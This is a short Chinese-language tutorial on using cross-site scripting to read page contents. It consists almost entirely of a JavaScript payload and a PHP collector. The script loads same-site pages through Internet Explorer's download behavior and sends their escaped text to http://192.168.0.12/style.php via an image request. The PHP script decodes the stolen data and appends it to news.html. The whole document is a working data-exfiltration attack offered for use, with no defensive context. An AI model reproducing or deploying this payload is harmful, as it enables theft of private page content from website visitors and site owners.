如何用xss文件页面内容读取

如何用xss文件页面内容读取

js:

document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";

for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){

GetData(source);
}
}

function GetData(source)
{  
txt=escape(source);
getReaded(txt);
}

function getReaded(usr) {
var newimg = new Image();
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n";

}

 

php:

<?php
header('Content-Type:text/html;charset=utf-8');
function   unescape($str)   {    
                    $str   =   rawurldecode($str);    
                    preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);    
                    $ar   =   $r[0];    
                    foreach($ar   as   $k=>$v)   {    
                                      if(substr($v,0,2)   ==   "%u")    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));    
                                      elseif(substr($v,0,3)   ==   "&#x")    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));    
                                      elseif(substr($v,0,2)   ==   "&#")   {    
                                                        $ar[$k]   =   iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));    
                                      }    
                    }    
                    return   join("",$ar);    
}

$file="news.html";
$_GET['key']=unescape($_GET['key']);

fputs(fopen($file,'a+'),$_GET['key']);

?>